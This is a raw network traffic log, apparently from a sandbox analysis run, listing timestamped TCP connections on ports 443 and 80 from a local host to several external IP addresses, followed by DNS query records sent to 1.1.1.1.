                                              Dec 18, 2024 23:41:57.468051910 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:57.468187094 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:57.468218088 CET4434977135.190.80.1192.168.2.4
                                              Dec 18, 2024 23:41:57.468241930 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:57.468310118 CET49771443192.168.2.435.190.80.1
                                              Dec 18, 2024 23:41:57.711106062 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:57.711417913 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:57.711456060 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:57.712201118 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:57.712515116 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:57.712616920 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:57.712636948 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:57.753056049 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:57.753082991 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:57.898243904 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:57.898538113 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:57.898555994 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:57.899673939 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:57.900033951 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:57.900158882 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:57.900166988 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:57.900206089 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:57.941960096 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:58.161802053 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:58.161973953 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:58.162065983 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:58.162974119 CET49772443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:41:58.163022995 CET44349772104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:41:58.350558043 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:58.350788116 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:58.350836039 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:58.350855112 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:58.350943089 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:58.350981951 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:58.351377010 CET49773443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:58.351397038 CET44349773104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:58.656009912 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:58.656049013 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:58.656147957 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:58.656372070 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:58.656394005 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:59.873670101 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:59.873963118 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:59.874008894 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:59.875112057 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:59.875444889 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:59.875603914 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:41:59.875617027 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:59.875658035 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:41:59.929969072 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:00.318483114 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:00.318665028 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:00.318751097 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:00.319699049 CET49774443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:00.319761038 CET44349774104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:00.322398901 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:00.322487116 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:00.322577953 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:00.322778940 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:00.322807074 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:00.722793102 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:00.722882032 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:00.722976923 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:00.723654985 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:00.723706007 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:01.545238972 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:01.545542002 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:01.545579910 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:01.546670914 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:01.547055006 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:01.547168970 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:01.547252893 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:01.596124887 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:01.941772938 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:01.942209005 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:01.942292929 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:01.942760944 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:01.943139076 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:01.943227053 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:01.943331957 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:01.943392992 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:01.943463087 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:01.943588018 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:01.943629980 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:01.991868019 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:01.992352009 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:01.992420912 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:01.992878914 CET49775443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:01.992907047 CET44349775104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:02.554138899 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.554280996 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.554368973 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.554368973 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.554430008 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.554485083 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.554832935 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.561760902 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.561826944 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.561856985 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.568413019 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.568511963 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.568572998 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.577003956 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.577215910 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.577276945 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.625596046 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.673970938 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.717113018 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.717190981 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.750591993 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.750742912 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.750794888 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.750858068 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.751267910 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.758301020 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.761754036 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.761930943 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.761991024 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.768296957 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.768387079 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.768445969 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.768486977 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:02.768771887 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.768773079 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:02.780478954 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:02.780569077 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:02.780689955 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:02.780870914 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:02.780899048 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:03.076174021 CET49776443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:03.076235056 CET44349776104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:03.998928070 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:03.999361992 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:03.999423981 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:04.001008987 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:04.001424074 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:04.001580954 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:04.001607895 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:04.001763105 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:04.050774097 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:04.442500114 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:04.442676067 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:04.442754984 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:04.443105936 CET49777443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:04.443146944 CET44349777104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:10.481323004 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:10.481411934 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:10.481537104 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:10.481786966 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:10.481822968 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:11.733216047 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:11.733633995 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:11.733695030 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:11.734800100 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:11.735120058 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:11.735277891 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:11.735290051 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:11.735332012 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:11.735420942 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:11.735455990 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:11.735589981 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:11.735754013 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:12.438505888 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:12.438673973 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:12.438798904 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:12.438868999 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:12.438931942 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:12.439003944 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:12.439563036 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:12.439764023 CET44349778104.18.94.41192.168.2.4
                                              Dec 18, 2024 23:42:12.439941883 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:12.439941883 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:12.439943075 CET49778443192.168.2.4104.18.94.41
                                              Dec 18, 2024 23:42:12.449717999 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:12.449804068 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:12.449889898 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:12.450108051 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:12.450138092 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:12.884941101 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:12.885035038 CET44349780172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:12.885149002 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:12.885426998 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:12.885468006 CET44349780172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:13.671550989 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:13.671932936 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:13.671966076 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:13.672421932 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:13.672745943 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:13.672832012 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:13.672882080 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:13.719348907 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:13.722506046 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:14.104604006 CET44349780172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:14.105040073 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.105104923 CET44349780172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:14.109031916 CET44349780172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:14.109131098 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.109453917 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.109492064 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.109520912 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.109652042 CET44349780172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:14.109735012 CET49780443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.109844923 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.109925985 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:14.110023022 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.110215902 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:14.110240936 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:14.116306067 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:14.116471052 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:14.116543055 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:14.117122889 CET49779443192.168.2.4104.18.95.41
                                              Dec 18, 2024 23:42:14.117162943 CET44349779104.18.95.41192.168.2.4
                                              Dec 18, 2024 23:42:15.356645107 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:15.358906031 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:15.358931065 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:15.360559940 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:15.360635042 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:15.363517046 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:15.363603115 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:15.364098072 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:15.364105940 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:15.409892082 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:16.228001118 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:16.228279114 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:16.228773117 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:16.229378939 CET49781443192.168.2.4172.67.188.29
                                              Dec 18, 2024 23:42:16.229418039 CET44349781172.67.188.29192.168.2.4
                                              Dec 18, 2024 23:42:16.401503086 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:16.401576996 CET44349782104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:16.401694059 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:16.401981115 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:16.402018070 CET44349782104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:17.616100073 CET44349782104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:17.639681101 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.639735937 CET44349782104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:17.643534899 CET44349782104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:17.643651962 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.681484938 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.681484938 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.681554079 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.681859016 CET44349782104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:17.681909084 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.681961060 CET49782443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.681977987 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:17.682059050 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.682260036 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:17.682286024 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:18.898987055 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:18.899375916 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:18.899439096 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:18.902950048 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:18.903060913 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:18.903419018 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:18.903503895 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:18.903574944 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:18.903609991 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:18.956907988 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:19.798001051 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:19.798274994 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:19.798372030 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:19.799174070 CET49783443192.168.2.4104.21.7.246
                                              Dec 18, 2024 23:42:19.799216032 CET44349783104.21.7.246192.168.2.4
                                              Dec 18, 2024 23:42:29.536652088 CET49807443192.168.2.4142.250.181.132
                                              Dec 18, 2024 23:42:29.536699057 CET44349807142.250.181.132192.168.2.4
                                              Dec 18, 2024 23:42:29.536782980 CET49807443192.168.2.4142.250.181.132
                                              Dec 18, 2024 23:42:29.537036896 CET49807443192.168.2.4142.250.181.132
                                              Dec 18, 2024 23:42:29.537044048 CET44349807142.250.181.132192.168.2.4
                                              Dec 18, 2024 23:42:30.503416061 CET4972480192.168.2.4199.232.210.172
                                              Dec 18, 2024 23:42:30.624844074 CET8049724199.232.210.172192.168.2.4
                                              Dec 18, 2024 23:42:30.625046015 CET4972480192.168.2.4199.232.210.172
                                              Dec 18, 2024 23:42:31.236536026 CET44349807142.250.181.132192.168.2.4
                                              Dec 18, 2024 23:42:31.236874104 CET49807443192.168.2.4142.250.181.132
                                              Dec 18, 2024 23:42:31.236923933 CET44349807142.250.181.132192.168.2.4
                                              Dec 18, 2024 23:42:31.238068104 CET44349807142.250.181.132192.168.2.4
                                              Dec 18, 2024 23:42:31.238604069 CET49807443192.168.2.4142.250.181.132
                                              Dec 18, 2024 23:42:31.238785028 CET44349807142.250.181.132192.168.2.4
                                              Dec 18, 2024 23:42:31.284924984 CET49807443192.168.2.4142.250.181.132
                                              Dec 18, 2024 23:42:40.928812981 CET44349807142.250.181.132192.168.2.4
                                              Dec 18, 2024 23:42:40.928977013 CET44349807142.250.181.132192.168.2.4
                                              Dec 18, 2024 23:42:40.929039955 CET49807443192.168.2.4142.250.181.132
                                              Dec 18, 2024 23:42:42.444086075 CET49807443192.168.2.4142.250.181.132
                                              Dec 18, 2024 23:42:42.444113970 CET44349807142.250.181.132192.168.2.4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 18, 2024 23:41:26.060410023 CET53548021.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:26.134880066 CET53503381.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:28.899466991 CET53533001.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:29.474417925 CET4957353192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:29.474488020 CET6347553192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:29.613409996 CET53634751.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:29.613713026 CET53495731.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:34.095216990 CET5913853192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:34.095371008 CET5758053192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:34.331871986 CET53575801.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:34.333515882 CET53591381.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:37.438590050 CET5442453192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:37.438771009 CET5856753192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:37.578268051 CET53585671.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:37.579421043 CET53544241.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:40.829696894 CET6025453192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:40.829895973 CET6207553192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:41.231903076 CET53602541.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:41.234044075 CET53620751.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:42.092828989 CET138138192.168.2.4192.168.2.255
                                              Dec 18, 2024 23:41:44.617605925 CET6216653192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:44.617741108 CET6229053192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:44.618068933 CET5249453192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:44.618189096 CET5030553192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:44.618769884 CET5013253192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:44.618974924 CET5824853192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:44.756608963 CET53622901.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:44.756773949 CET53621661.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:44.757049084 CET53524941.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:44.757330894 CET53503051.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:44.758346081 CET53501321.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:44.758521080 CET53582481.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:45.947468996 CET53586441.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:46.860954046 CET6342253192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:46.861131907 CET6161853192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:46.862865925 CET6359753192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:46.863039970 CET6073053192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:46.999996901 CET53634221.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:47.000030994 CET53616181.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:47.001735926 CET53607301.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:47.001838923 CET53635971.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:48.421036959 CET5836953192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:48.422405005 CET5540253192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:48.451685905 CET4957453192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:48.451848984 CET5199653192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:48.561606884 CET53583691.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:48.563922882 CET53554021.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:48.590924978 CET53519961.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:48.591981888 CET53495741.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:52.895529032 CET5311353192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:52.895703077 CET5731153192.168.2.41.1.1.1
                                              Dec 18, 2024 23:41:53.035473108 CET53573111.1.1.1192.168.2.4
                                              Dec 18, 2024 23:41:53.035540104 CET53531131.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:04.738600969 CET53501641.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:12.445812941 CET6010653192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:12.445934057 CET5140653192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:12.884068012 CET53514061.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:12.884139061 CET53601061.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:16.244482994 CET5667453192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:16.244676113 CET5668053192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:16.256088018 CET5066953192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:16.256202936 CET5342453192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:16.399496078 CET53534241.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:16.400727987 CET53506691.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:16.531208038 CET53566801.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:16.579843044 CET53566741.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:16.580960989 CET5260853192.168.2.41.1.1.1
